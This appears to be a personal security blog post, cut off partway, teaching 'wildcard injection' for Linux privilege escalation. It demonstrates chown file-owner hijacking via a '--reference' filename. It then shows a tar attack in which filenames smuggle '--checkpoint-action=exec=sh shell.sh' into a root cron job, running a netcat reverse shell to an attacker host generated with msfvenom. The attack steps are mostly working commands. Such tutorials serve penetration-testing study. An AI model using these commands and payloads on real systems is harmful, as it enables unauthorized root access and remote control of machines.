<!doctype html><html amp lang="en-us"><head><meta charset="utf-8"><title>Exploiting Wildcard for Privilege Escalation - Sakibul Ali Khan</title><meta name="description" content="Exploiting Wildcard for Privilege Escalation In this article, we will cover “Wildcard Injection” an interesting old-school UNIX hacking technique, which is still a&hellip;"><link rel="canonical" href="https://sakibulalikhan.github.io/blog/exploiting-wildcard-for-privilege-escalation.html"><meta name="viewport" content="width=device-width,minimum-scale=1,initial-scale=1"><link href="https://fonts.googleapis.com/css?family=Roboto:400,700&display=swap" rel="stylesheet" type="text/css"><script async custom-element="amp-sidebar" src="https://cdn.ampproject.org/v0/amp-sidebar-0.1.js"></script><script async custom-element="amp-social-share" src="https://cdn.ampproject.org/v0/amp-social-share-0.1.js"></script><script async custom-element="amp-iframe" src="https://cdn.ampproject.org/v0/amp-iframe-0.1.js"></script><script async custom-element="amp-video" src="https://cdn.ampproject.org/v0/amp-video-0.1.js"></script><script type="application/ld+json">{"@context":"http://schema.org","@type":"Article","mainEntityOfPage":{"@type":"WebPage","@id":"https://sakibulalikhan.github.io/blog/amp/exploiting-wildcard-for-privilege-escalation.html"},"headline":"Exploiting Wildcard for Privilege Escalation","datePublished":"2022-01-10T21:26","dateModified":"2022-01-10T21:26","image":{"@type":"ImageObject","url":"https://sakibulalikhan.github.io/blog/media/posts/6/prev-2.jpeg","height":266,"width":474},"description":"Exploiting Wildcard for Privilege Escalation In this article, we will cover “Wildcard Injection” an interesting old-school UNIX hacking technique, which is still a&hellip;","author":{"@type":"Person","name":"Sakibul Ali Khan","url":"https://sakibulalikhan.github.io/blog/amp/authors/sakibul-ali-khan/"},"publisher":{"@type":"Organization","name":"Sakibul Ali Khan"}}</script><style amp-custom>article,
aside,
footer,
header,
hgroup,
main,
nav,
section {
  display: block; }

*,
*:before,
*:after {
  -webkit-box-sizing: content-box;
  box-sizing: content-box;
  margin: 0;
  padding: 0; }

li {
  list-style: none; }

amp-img {
  max-width: 100%; }

button,
input,
select,
textarea {
  font: inherit; }

html {
  font-size: 1rem; }

body {
  background: #f1f1f1;
  color: #262626;
  font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;
  line-height: 1.6; }

a {
  color:  #039be5;
  text-decoration: none;
  -webkit-transition: all 0.12s linear 0s;
  -o-transition: all 0.12s linear 0s;
  transition: all 0.12s linear 0s; }

a:hover {
  color: #262626;
  text-decoration: underline;
  -webkit-text-decoration-skip: ink;
  text-decoration-skip: ink; }

a:active {
  color: #262626; }

a:focus {
  outline: 2px dotted #039be5; }

figure,
blockquote,
p,
ul,
ol,
dl,
table,
hr,
fieldset {
  margin-top: 1.6rem; }

h1,
h2,
h3,
h4,
h5,
h6 {
  color: #262626;
  font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;
  font-weight: 500;
  line-height: 1.2;
  margin-top: 2.13333rem; }

h1 {
  font-size: 1.67583rem;
  font-weight: normal; }

h2 {
  font-size: 1.4729rem; }

h3 {
  font-size: 1.29454rem; }

h4 {
  font-size: 1.13778rem; }

h5 {
  font-size: 1rem; }

h6 {
  font-size: 0.87891rem; }

h2 + p,
h3 + p,
h4 + p,
h5 + p,
h6 + p {
  margin-top: 0.8rem; }

b,
strong {
  font-weight: 600; }

blockquote {
  color: #6c7175;
  font-family: "Droid Serif", "Times", "Source Serif Pro", serif;
  font-style: italic;
  padding: 1.33333rem 0.53333rem 1.33333rem 3.2rem;
  position: relative; }
  blockquote:before {
    display: block;
    content: "\201C";
    font-size: 4.41226rem;
    position: absolute;
    left: 0;
    top: -12px;
    color: rgba(108, 113, 117, 0.5); }
  blockquote > :nth-child(1) {
    margin-top: 0; }

ul,
ol {
  margin-left: 2rem; }
  ul > li,
  ol > li {
    list-style: inherit;
    padding: 0 0 0.26667rem 0.26667rem; }

dl dt {
  color: #262626;
  font-weight: 600; }

code,
pre {
  background-color: #f1f1f1;
  font-family: monospace; }

pre {
  margin: 1.6rem 0 0;
  padding: 1.6rem;
  white-space: pre-wrap;
  word-wrap: break-word;
  overflow-x: auto; }
  pre > code {
    color: #262626;
    padding: 0; }

code {
  border-radius: 3px;
  color: #262626;
  padding: 0.26667rem 0.53333rem; }

table {
  border-collapse: collapse;
  border-spacing: 0;
  border: 1px solid #d4d4d4;
  width: 100%;
  overflow-x: auto;
  vertical-align: top;
  text-align: left;
  white-space: nowrap; }
  table th {
    font-weight: 500;
    padding: 0.53333rem 1.06667rem; }
  table tr {
    border-bottom: 1px solid #d4d4d4; }
    table tr:nth-child(2n) {
      background: #f1f1f1; }
  table td {
    padding: 0.53333rem 1.06667rem; }

figcaption {
  clear: both;
  color: rgba(108, 113, 117, 0.6);
  font-size: 0.82397rem;
  margin: 0.8rem 0 0;
  text-align: center; }

sub,
sup {
  font-size: 65%; }

hr {
  border: 0;
  height: 0;
  border-top: 1px solid rgba(0, 0, 0, 0.1);
  border-bottom: 1px solid rgba(255, 255, 255, 0.3); }

.btn, [type=button],
[type=submit],
button {
  background: #039be5;
  border: none;
  border-radius: 2px;
  color: #ffffff;
  cursor: pointer;
  display: inline-block;
  font-size: 0.87891rem;
  font-weight: 500;
  line-height: 1.9;
  padding: 0.53333rem 1.33333rem;
  text-align: center;
  text-decoration: none;
  -webkit-transition: all .15s ease;
  -o-transition: all .15s ease;
  transition: all .15s ease;
  width: auto; }
  .btn:hover, [type=button]:hover,
  [type=submit]:hover,
  button:hover {
    background: #262626;
    color: #ffffff; }
  .btn:focus, [type=button]:focus,
  [type=submit]:focus,
  button:focus {
    outline: none; }
  .btn-outline {
    border: 1px solid #ddd;
    background: #ffffff;
    border-radius: 3px;
    color: #262626; }

[type=button],
[type=submit],
button {
  text-transform: uppercase;
  -webkit-appearance: none;
  -moz-appearance: none; }

.navbar {
  background: #039be5;
  -webkit-box-shadow: 0 0 6px 0 rgba(0, 0, 0, 0.2);
  box-shadow: 0 0 6px 0 rgba(0, 0, 0, 0.2);
  line-height: 3;
  max-height: 4rem; }
  .navbar > div {
    -webkit-box-align: center;
    -ms-flex-align: center;
    align-items: center;
    display: -webkit-box;
    display: -ms-flexbox;
    display: flex;
    -webkit-box-pack: center;
    -ms-flex-pack: center;
    justify-content: center;
    text-align: left;
    max-width: 700px;
    margin: 0 auto; }
  .navbar a {
    color: #ffffff;
    text-decoration: none; }
  .navbar-sidebar-toggle {
    left: 0;
    position: relative;
    text-indent: -99999rem; }
    .navbar-sidebar-toggle:before {
      content: "";
      display: block;
      border-top: 0.375rem double #ffffff;
      border-bottom: 0.125rem solid #ffffff;
      height: 0.125rem;
      position: absolute;
      text-indent: 0;
      top: 50%;
      width: 1.3rem;
      -webkit-transform: translate(0px, -50%);
      -ms-transform: translate(0px, -50%);
      transform: translate(0px, -50%); }


.logo {
            display: inline-block;
  font-weight: 600;
  line-height: 1;
            margin: 0 auto;
            height: 2rem;
            text-indent: -9999px;
            width: 240px;vertical-align: middle;
        }
        .logo.logo-text {
            line-height: 2;
            text-align: center;
            text-indent: 0;
        }

amp-sidebar {
  background: #ffffff;
  width: 240px; }
  amp-sidebar > ul {
    margin: 0.8rem 0 0;
    padding: 0; }
    amp-sidebar > ul ul {
      border-left: 1px solid #d4d4d4;
      margin: 0.53333rem 0 0; }
    amp-sidebar > ul li {
      color: #262626;
      font-size: 0.9375rem;
      font-weight: 600;
      list-style: none;
      line-height: 1.4;
      padding: 0.42667rem 1.06667rem; }
      amp-sidebar > ul li li {
        font-weight: normal;
        padding: 0.26667rem 0 0.26667rem 1.06667rem; }
    amp-sidebar > ul a,
    amp-sidebar > ul a:visited {
      color: #262626; }

.bg-white {
  background: #ffffff; }

.wrap-page {
  max-width: 700px;
  margin: 0 auto; }

@media all and (max-width: 43.6875em) {
  .wrap-inner {
    padding: 0 6%; } }

.page-title {
  background: #ffffff;
  -webkit-box-shadow: 0 2px 3px rgba(38, 38, 38, 0.1);
  box-shadow: 0 2px 3px rgba(38, 38, 38, 0.1);
  margin-bottom: 0.8rem;
  padding: 1.6rem 6%; }
  .page-title > h1 {
    margin: 0;
    font-size: 1.29454rem; }
  .page-title > p {
    font-size: 0.87891rem;
    color: #6c7175;
    line-height: 1.3;
    margin: 0.26667rem 0 0; }
  .page-title-author {
    border-radius: 50%;
    float: left;
    height: 2.5rem;
    width: 2.5rem; }
    .page-title-author + h1 {
      margin-left: 3.5rem; }
      .page-title-author + h1 + p {
        margin-left: 3.5rem; }

.card {
  background: #ffffff;
  -webkit-box-shadow: 0 2px 3px rgba(38, 38, 38, 0.1);
  box-shadow: 0 2px 3px rgba(38, 38, 38, 0.1);
  margin-bottom: 0.8rem;
  padding-bottom: 1.06667rem; }

  .card-meta {
    border-top: 1px solid #d4d4d4;
    color: rgba(108, 113, 117, 0.6);
    font-size: 0.7242rem;
    font-weight: 500;
    margin-top: 1.06667rem;
    padding-top: 1.06667rem;
    text-transform: uppercase; }
    .card-meta a + time:before {
      content: "";
      background: #d4d4d4;
      display: inline-block;
      height: 3px;
      margin: 0 8px;
      width: 3px;
      vertical-align: middle;
      border-radius: 50%; }
  .card-text {
    font-size: 0.9375rem;
    overflow: hidden;
    padding: 0 6%; }
    .card-text h2 {
      font-size: 1.13778rem; }

.post {
  margin-bottom: 2.13333rem; }
  .post-featured-image {
    margin-top: 0;
    position: relative; }
    .post-featured-image > figcaption {
      background: rgba(0, 0, 0, 0.5);
      border-radius: 3px;
      color: #ffffff;
      position: absolute;
      bottom: 0.8rem;
      padding: 0 0.26667rem;
      right: 6%; }
  .post-header {
    margin-bottom: 2.13333rem; }
  .post-meta {
    border-bottom: 1px solid #d4d4d4;
    color: rgba(108, 113, 117, 0.6);
    font-size: 0.7242rem;
    font-weight: 500;
    margin-top: 1.06667rem;
    padding-bottom: 1.06667rem;
    text-transform: uppercase; }
    .post-meta a + time:before {
      content: "";
      background: #d4d4d4;
      display: inline-block;
      height: 3px;
      margin: 0 8px;
      width: 3px;
      vertical-align: middle;
      border-radius: 50%; }
  .post-tag {
    margin: 0; }
    .post-tag > li {
      display: inline-block;
      padding: 0; }
      .post-tag > li a {
        background: #f1f1f1;
        border-radius: 2px;
        color: #6c7175;
        font-size: 0.77248rem;
        display: inline-block;
        margin: 0 0.26667rem 0.26667rem 0;
        padding: 0.26667rem 0.53333rem; }
        .post-tag > li a:hover {
          background: #039be5;
          color: #ffffff;
          text-decoration: none; }
  .post-share {
    display: -webkit-box;
    display: -ms-flexbox;
    display: flex;
    -webkit-box-orient: horizontal;
    -webkit-box-direction: normal;
    -ms-flex-direction: row;
    flex-direction: row;
    -webkit-box-pack: justify;
    -ms-flex-pack: justify;
    justify-content: space-between;
    margin-top: 1.6rem;
    width: 100%; }
    .post-share amp-social-share {
      -webkit-box-flex: 1;
      -ms-flex: 1 0 auto;
      flex: 1 0 auto;
      background-size: 24px; }
  .post-scroll {
    color: #ffffff;
    background: #039be5;
    bottom: 10px;
    border-radius: 50%;
    border: none;
    -webkit-box-shadow: 0 1px 1.5px 0 rgba(38, 38, 38, 0.12), 0 1px 1px 0 rgba(38, 38, 38, 0.24);
    box-shadow: 0 1px 1.5px 0 rgba(38, 38, 38, 0.12), 0 1px 1px 0 rgba(38, 38, 38, 0.24);
    font-size: 1.13778rem;
    height: 46px;
    opacity: 0;
    outline: none;
    position: fixed;
    padding: 0;
    right: 4%;
    visibility: hidden;
    width: 46px;
    z-index: 9999; }
    .post-scroll-marker {
      height: 0px;
      position: absolute;
      top: 100px;
      width: 0px; }
        .post-pagination {
    background: #f1f1f1;
    -webkit-box-shadow: inset 0 2px 3px rgba(38, 38, 38, 0.1);
    box-shadow: inset 0 2px 3px rgba(38, 38, 38, 0.1);
    border-top: 1px solid #d4d4d4;
    padding: 1.06667rem 0; }
    .post-pagination > div {
      line-height: 1.2;
      padding: 0.53333rem 1.06667rem;
      text-align: center; }
      .post-pagination > div span {
        display: block;
        color: #6c7175;
        font-size: 0.7242rem;
        font-weight: 500;
        margin-bottom: 0.26667rem;
        text-transform: uppercase; }
    .post-pagination-prev a:before {
      content: "\2190";
      margin-right: 0.26667rem; }
    .post-pagination-next a:after {
      content: "\2192";
      margin-left: 0.26667rem; }

aside {
  margin: 1.6rem 0 0; }

.align-left {
  text-align: left; }

.align-right {
  text-align: right; }

.align-center {
  text-align: center; }

.align-justify {
  text-align: justify; }

.msg {
  border-left: 2px solid transparent;
  padding: 1.06667rem 1.06667rem; }
  .msg--highlight {
    background-color: #fff8e6;
    border-color: #e2ac4f; }
  .msg--info {
    background: rgba(45, 97, 201, 0.03);
    border-color: #039be5; }
  .msg--success {
    background: #f7fbf6;
    border-color: #5ab44b; }
  .msg--warning {
    background: #fff3f3;
    border-color: #c06367;
    color: #a94442; }

.dropcap:first-letter {
  float: left;
  font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;
  font-size: 2.16943rem;
  line-height: 0.7;
  margin-right: 0.53333rem;
  padding: 0.53333rem 0.53333rem 0.53333rem 0; }

.pagination {
  display: -webkit-box;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-pack: justify;
  -ms-flex-pack: justify;
  justify-content: space-between;
  margin: 0.8rem 0; }
  .pagination > a {
    padding-left: 0;
    padding-right: 0;
    width: 49%; }
  .pagination-right {
    margin-left: auto; }

.bottom {
  background: #039be5;
  color: #ffffff;
  padding: 1.06667rem 4%;
  text-align: center; }</style><style amp-boilerplate>body{-webkit-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-moz-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-ms-animation:-amp-start 8s steps(1,end) 0s 1 normal both;animation:-amp-start 8s steps(1,end) 0s 1 normal both}@-webkit-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-moz-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-ms-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-o-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}</style><noscript><style amp-boilerplate>body{-webkit-animation:none;-moz-animation:none;-ms-animation:none;animation:none}</style></noscript><script async src="https://cdn.ampproject.org/v0.js"></script><script custom-element="amp-animation" src="https://cdn.ampproject.org/v0/amp-animation-0.1.js" async></script><script custom-element="amp-position-observer" src="https://cdn.ampproject.org/v0/amp-position-observer-0.1.js" async></script></head><body class="bg-white"><nav class="navbar wrap-inner" id="top"><div><a on="tap:navbar-sidebar.toggle" class="navbar-sidebar-toggle" title="Menu">Menu</a> <a class="logo logo-text" href="https://sakibulalikhan.github.io/blog/amp/">Sakibul Ali Khan</a></div></nav><main class="wrap-page"><article class="post"><figure class="post-featured-image"><amp-img src="https://sakibulalikhan.github.io/blog/media/posts/6/prev-2.jpeg" alt="Wildcard for Privilege Escalation" srcset="https://sakibulalikhan.github.io/blog/media/posts/6/responsive/prev-2-xs.jpeg 300w ,https://sakibulalikhan.github.io/blog/media/posts/6/responsive/prev-2-sm.jpeg 480w ,https://sakibulalikhan.github.io/blog/media/posts/6/responsive/prev-2-md.jpeg 768w" sizes="(max-width: 768px) 100vw, 768px" height="266" layout="responsive" width="474"></amp-img><figcaption>Wildcard for Privilege Escalation</figcaption></figure><div class="wrap-inner"><header class="post-header"><h1>Exploiting Wildcard for Privilege Escalation</h1><p class="post-meta"><time datetime="2022-01-10T21:26">January 10, 2022</time></p></header><h1 class="post-title entry-title">Exploiting Wildcard for Privilege Escalation</h1><div class="post-date"><figure class="post__image"><amp-img src="https://sakibulalikhan.github.io/blog/media/posts/6/prev.jpeg" sizes="(max-width: 48em) 100vw, 768px" srcset="https://sakibulalikhan.github.io/blog/media/posts/6/responsive/prev-xs.jpeg 300w ,https://sakibulalikhan.github.io/blog/media/posts/6/responsive/prev-sm.jpeg 480w ,https://sakibulalikhan.github.io/blog/media/posts/6/responsive/prev-md.jpeg 768w ,https://sakibulalikhan.github.io/blog/media/posts/6/responsive/prev-lg.jpeg 1024w ,https://sakibulalikhan.github.io/blog/media/posts/6/responsive/prev-xl.jpeg 1360w ,https://sakibulalikhan.github.io/blog/media/posts/6/responsive/prev-2xl.jpeg 1600w" alt="Wildcard for Privilege Escalation" width="474" height="266" layout="responsive"></amp-img></figure></div><div class="content post-excerpt entry-content clearfix"><p>In this article, we will cover “Wildcard Injection” an interesting old-school UNIX hacking technique, which is still a successful approach for Post exploitation and even many security-related folks haven’t heard of it. Here you will get surprised after perceiving some UNIX tools like ‘tar’ or ‘chown’ can lead to full system compromise.</p><h3><strong>Table of content</strong></h3><ul><li>Introduction</li><li>Wildcard</li><li>Wildcard wildness example 1</li><li>File hijacking example 2</li><li>Post Exploitation via tar (Phase I)</li><li>Tar Wildcard Injection (1st method)</li><li>Post Exploitation via tar (Phase II)</li><li>Tar Wildcard Injection (1st method)</li><li>Tar Wildcard Injection (2nd method)</li><li>Tar Wildcard Injection (3rd method)</li></ul><p><strong>Let’s Start!!!</strong></p><h3><strong>Wildcard</strong></h3><p>The wildcard is a character or set of characters that can be used as a replacement for some range/class of characters. Wildcards are interpreted by the shell before any other action is taken.</p><p><strong>Some Wildcards character:</strong></p><p><strong>*</strong>     An asterisk matches any number of character in a filename, including none.</p><p><strong> ?</strong>     The question mark matches any single character.</p><p><strong>[ ]</strong>   Brackets enclose a set of characters, any one of which may match a single character at that position.</p><p> <strong>–  </strong>   A hyphen used within [ ] denotes a range of characters.</p><p><strong>~</strong>     A tilde at the beginning of a word expands to the name of your home directory. Append another user’s login name to the character, it refers to that user’s home directory.</p><p><strong>1<sup>st</sup> Example</strong></p><p>You might be aware of wildcard symbol and their traditional usage but here we are presenting wildcard wildness and for this, I would like to draw your attention to the below steps.</p><pre class="lang:default decode:true">cd /Desktop
mkdir wild
cd wild
echo "Hello Friends" &gt; file1
echo "This is Wildcard Injection" &gt; file2
echo "take help" &gt; --help</pre><p>So as you can observe, here we have made a new directory “wild” on the desktop then with help of the echo command we have created 3 files and written 1 line in each file.</p><figure class="jetpack-lazy-image jetpack-lazy-image--handled"><amp-img src="https://i0.wp.com/4.bp.blogspot.com/-aNOs6VHwEW4/Wy4yZSdnuyI/AAAAAAAAXek/4gsiqBUoScAe1vqzQ2i5PWd_2hUFfrfVACEwYBhgL/s1600/1.1.png?w=640" data-is-external-image="true" loading="eager" data-recalc-dims="1" data-lazy-loaded="1" layout="responsive"></amp-img></figure><p>Afterwards, with help of the cat command, we try to open all the above 3 files as shown:</p><pre class="lang:default decode:true">cat file1
cat file 2
cat --help</pre><p>However, the first two files opened normally and show the same information as written above. But the cat command failed to read information written inside –help file. Instead of showing “take help” while opening –help file it calls its own –help options from its own libraries &amp; such type of trick is called <strong>Wildcard wildness</strong>.</p><figure class="jetpack-lazy-image jetpack-lazy-image--handled"><amp-img src="https://i0.wp.com/1.bp.blogspot.com/-aEBHdou9cpU/Wy4yZvUHwVI/AAAAAAAAXgQ/sb4tiFcxRRM6RnAPxLPZtpMrCA1bnFX7QCEwYBhgL/s1600/1.2.png?w=640" data-is-external-image="true" loading="eager" data-recalc-dims="1" data-lazy-loaded="1" layout="responsive"></amp-img></figure><h3><strong>File owner hijacking via Chown</strong></h3><p>Similarly again we try to do something roguish with help of <strong>chown</strong> command. As we know it is an abbreviation of change owner, which is used on Unix-like systems to modify the ownership of file system files, directories and it may only be changed by a super-user. Let say we have three users in our system.</p><p>Super-user (<strong>root</strong>) – perform an admin-level task such as run <strong>chown</strong> command.</p><p>Non-root-user1 (<strong>raj</strong>) – perform ordinary jobs such as create file</p><p>Non-root-user2 (<strong>sak</strong>) – perform ordinary jobs such as create file</p><p>Mischief-user (<strong>Ignite</strong>) – perform a notorious task such as the <strong>Chown</strong> file reference trick that can lead to file owner hijacking.</p><p>In the following image, you can observe all the PHP file is owned by user: raj. Now when the user: ignite found all PHP file is own be user raj then he induces two PHP file himself in the same directory and uses file reference trick for file owner hijacking by executing below commands.</p><pre class="lang:default decode:true">ls -al
echo "" &gt; my.php
echo &gt; --reference=my.php</pre><figure class="jetpack-lazy-image jetpack-lazy-image--handled"><amp-img src="https://i1.wp.com/1.bp.blogspot.com/-9LX33vg4GDQ/Wy4yZkCeO6I/AAAAAAAAXgM/eI3TQ7LvuyQUSVsrVrmfwcNqn3Qqqok1wCEwYBhgL/s1600/1.3.png?w=640" data-is-external-image="true" loading="eager" data-recalc-dims="1" data-lazy-loaded="1" layout="responsive"></amp-img></figure><p>As you can notice, mostly file is owned by user: raj and the last two files are owned by user: ignite and when the super-user will be supposed to change ownership of all file having PHP extension with help of wildcard, then all files will indirectly come under the ownership of user: ignite.</p><p>As you can observe when root user run chown command to give ownership to all the PHP files to the user: aarti, an error occurred and as result, the all PHP file get seized by user: ignite automatically.</p><pre class="lang:default decode:true">chown -R aarti:aarti *.php
ls -al</pre><p><strong>Conceptual Information:</strong></p><p>If you have ever explored tar to read its optional switches then you will find the following option.</p><p><strong>–reference=RFILE</strong> (use RFILE’s owner and group rather than specifying OWNER: GROUP values)</p><p>In our case user: ignite executed the following commands:</p><pre class="lang:default decode:true">echo "" &gt; my.php
echo &gt; --reference=my.php</pre><p>Then root user takes the help of the wildcard character for changing ownership. Thing is that the wildcard character used in ‘chown’ command line took the subjective ‘–reference=.my.php’ file and passed it to the chown command at the command line as an option.</p><figure class="jetpack-lazy-image jetpack-lazy-image--handled"><amp-img src="https://i1.wp.com/2.bp.blogspot.com/-b9cA7Ai6bxg/Wy4yaFRWkKI/AAAAAAAAXgY/V_Z8aGXCbXcTHruYX0oIsiWDlaQ_SEl4wCEwYBhgL/s1600/1.4.png?w=640" data-is-external-image="true" loading="eager" data-recalc-dims="1" data-lazy-loaded="1" layout="responsive"></amp-img></figure><h3><strong>Post Exploitation via tar (Phase I)</strong></h3><p><strong>Lab-Setup</strong></p><p>Likewise again we extend the wildness of wildcard character to the ultimate level and it was like a dynamic explosion in terms of system hacking.</p><p>Tar is a very common UNIX program for creating and extracting archives. And with help of it, we are going to take a compress backup of any directory. For example, make a new directory and give ALL permission to it and then create some files.</p><pre class="lang:default decode:true">mkdir html
chmod 777 html
cd html
touch index.html
touch raj
touch file.txt</pre><figure class="jetpack-lazy-image jetpack-lazy-image--handled"><amp-img src="https://i0.wp.com/1.bp.blogspot.com/-REcPJzmUnrw/Wy4yaJOjmwI/AAAAAAAAXf8/9kCdJ-Gw8rQ7RLVSMTbuYeXCp7MXWFZ7wCEwYBhgL/s1600/1.png?w=640" data-is-external-image="true" loading="eager" data-recalc-dims="1" data-lazy-loaded="1" layout="responsive"></amp-img></figure><p>Now schedule a task with help of crontab to run tar archival program for taking backup of /html from inside /var/backups in every 1 minute.</p><pre class="lang:default decode:true">nano /etc/crontab
*/1 *   * * *   root tar -zcf /var/backups/html.tgz /var/www/html/*</pre><figure class="jetpack-lazy-image jetpack-lazy-image--handled"><amp-img src="https://i1.wp.com/1.bp.blogspot.com/-AyxeBLgnxPc/Wy4ydPEeVgI/AAAAAAAAXgg/-vhBlyxEK5ESW2zZXnGjN1I8OIDLPcYaACEwYBhgL/s1600/2.png?w=640" data-is-external-image="true" loading="eager" data-recalc-dims="1" data-lazy-loaded="1" layout="responsive"></amp-img></figure><p>Let’s verify the schedule is working or not by executing the following command.</p><pre class="lang:default decode:true">cd /var/backup
ls</pre><figure class="jetpack-lazy-image jetpack-lazy-image--handled"><amp-img src="https://i0.wp.com/2.bp.blogspot.com/-Y6KPox2OEXA/Wy4ydSFKCfI/AAAAAAAAXgE/u34EpcYKHMIaIRSrT2DpKhnjGqQm50kYgCEwYBhgL/s1600/3.png?w=640" data-is-external-image="true" loading="eager" data-recalc-dims="1" data-lazy-loaded="1" layout="responsive"></amp-img></figure><h3><strong>Tar Wildcard Injection (1<sup>st</sup> method)</strong></h3><p><strong>Privilege Escalation</strong></p><p>Start your attacking machine and first compromise the target system and then move to the privilege escalation stage. Suppose I successfully login into the victim’s machine through ssh and access the non-root user terminal. Then open crontab to view if any job is scheduled.</p><pre class="lang:default decode:true">cat /etc/crontab</pre><p>Here we notice the target has scheduled a tar archival program for every 1 minute and we know that cron job runs as root. Let’s try to exploit.</p><figure class="jetpack-lazy-image jetpack-lazy-image--handled"><amp-img src="https://i2.wp.com/2.bp.blogspot.com/-ALzdcI0seL4/Wy4ydtsDN7I/AAAAAAAAXgU/ibH2NahxT-wyhNFtVbA73eIT1rCEjtAPQCEwYBhgL/s1600/4.png?w=640" data-is-external-image="true" loading="eager" data-recalc-dims="1" data-lazy-loaded="1" layout="responsive"></amp-img></figure><p>On a new terminal generate netcat reverse shell malicious code for achieving netcat reverse connection by using msfvenom and enter the following command for that.</p><pre class="lang:default decode:true">msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.102 lport=8888 R</pre><p>Copy the generated payload and paste it inside the victim’s shell as described below.</p><p><strong>nc -lvp 8888</strong></p><figure class="jetpack-lazy-image jetpack-lazy-image--handled"><amp-img src="https://i0.wp.com/3.bp.blogspot.com/-_v2Z6h1mZtw/Wy4ydjM3BfI/AAAAAAAAXgQ/7tIEuYRSQPIbQPjv1FZCISd8-95eTRAqQCEwYBhgL/s1600/5.png?w=640" data-is-external-image="true" loading="eager" data-recalc-dims="1" data-lazy-loaded="1" layout="responsive"></amp-img></figure><p>Now paste the above-copied payload as described below and ran the following commands inside the victim’s tty shell.</p><pre class="lang:default decode:true">echo "mkfifo /tmp/lhennp; nc 192.168.1.102 8888 0&lt;/tmp/lhennp | /bin/sh &gt;/tmp/lhennp 2&gt;&amp;1; rm /tmp/lhennp" &gt; shell.sh
echo "" &gt; "--checkpoint-action=exec=sh shell.sh"
echo "" &gt; --checkpoint=1
tar cf archive.tar *</pre><figure class="jetpack-lazy-image jetpack-lazy-image--handled"><amp-img src="https://i1.wp.com/3.bp.blogspot.com/-yzOiHOko1H0/Wy4yd8dYSvI/AAAAAAAAXgM/Bo-5d1FkUTgm3foqjZFfI0YE_7Z0jka_wCEwYBhgL/s1600/6.png?w=640" data-is-external-image="true" loading="eager" data-recalc-dims="1" data-lazy-loaded="1" layout="responsive"></amp-img></figure><p>The above commands help the tar command to run the file shell.sh after the first file is archived. Since the tar command is running as root due to crontab, this has the effect of spawning a netcat shell and sending it to the attack platform on port 8888. And if you go back to the terminal window where the listener was on, you will have victim’s reverse connection in after 1 minute.</p><pre class="lang:default decode:true">id
whoami</pre><p><strong>Conceptual Information:</strong></p><p>If you have ever explored tar to read its optional switches then you will find the following option.</p><p><strong>–checkpoint[=NUMBER] </strong>show progress messages every Numbers record (default 10)</p><p><strong>–checkpoint-action=ACTION </strong>execute ACTION on each checkpoint</p><p>There is a ‘–checkpoint-action’ option, that will specify the program which will be executed when the checkpoint is reached. Mainly, this permits us to run an arbitrary command. Hence Options ‘–checkpoint=1’ and ‘–checkpoint-action=exec=sh shell.sh’ are handed to the ‘tar’ program as command-line options.</p><figure class="jetpack-lazy-image jetpack-lazy-image--handled"><amp-img src="https://i2.wp.com/4.bp.blogspot.com/-f7RK3fLz7Wg/Wy4yeTLp10I/AAAAAAAAXgc/mLSgGGl97kAMbrY4L0pjaYdwVDHuIOGVACEwYBhgL/s1600/7.png?w=640" data-is-external-image="true" loading="eager" data-recalc-dims="1" data-lazy-loaded="1" layout="responsive"></amp-img></figure><h3><strong>Post Exploitation via tar (Phase II)</strong></h3><p><strong>Lab Setup</strong></p><p>There are multiple ways to take compressed backup and multi techniques can also be applied for privilege escalation. In this phase, with help of tar, we are going to take a compress backup of a directory. For example, make a new directory whose backup you wish to take and give ALL permission to it and then create some files.</p><pre class="lang:default decode:true">cd /tmp
mkdir data
chmod 777 data
cd data
echo "" &gt; f1
echo "" &gt; f2
echo "" &gt; f3
ls</pre><figure class="jetpack-lazy-image jetpack-lazy-image--handled"><amp-img src="https://i1.wp.com/3.bp.blogspot.com/-2pISut2VhcU/Wy4yesWI4iI/AAAAAAAAXgU/wEDVMlubTSMnbDSzRRTVd_CMHqiXiQ8DACEwYBhgL/s1600/8.png?w=640" data-is-external-image="true" loading="eager" data-recalc-dims="1" data-lazy-loaded="1" layout="responsive"></amp-img></figure><p>Now in the other directory write a bash script for taking backup of /tmp/data with help of tar archive program.</p><pre class="lang:default decode:true">mkdir info
cd info
nano script.sh
chmod 777 script.sh</pre><figure class="jetpack-lazy-image jetpack-lazy-image--handled"><amp-img src="https://i2.wp.com/4.bp.blogspot.com/-tmCJCuvklv8/Wy4ye0om65I/AAAAAAAAXgU/JA-b7s6GQYEEGD5Yz5dqLTQCzb3ckQ8KACEwYBhgL/s1600/9.png?w=640" data-is-external-image="true" loading="eager" data-recalc-dims="1" data-lazy-loaded="1" layout="responsive"></amp-img></figure><pre class="lang:default decode:true">#!/bin/bash
cd /tmp/data
tar cf /info/backup.tgz *</pre><figure class="jetpack-lazy-image jetpack-lazy-image--handled"><amp-img src="https://i2.wp.com/2.bp.blogspot.com/-Z1IWZDv6Jvg/Wy4yaecZnuI/AAAAAAAAXgQ/LqowF9_7BNUA9H5iH8pSn_kact8q46W4QCEwYBhgL/s1600/10.png?w=640" data-is-external-image="true" loading="eager" data-recalc-dims="1" data-lazy-loaded="1" layout="responsive"></amp-img></figure><p>Now schedule a task with help of crontab to run tar archival program for taking backup of /html inside /var/backups in every 1 minute.</p><pre class="lang:default decode:true">nano /etc/crontab                                   
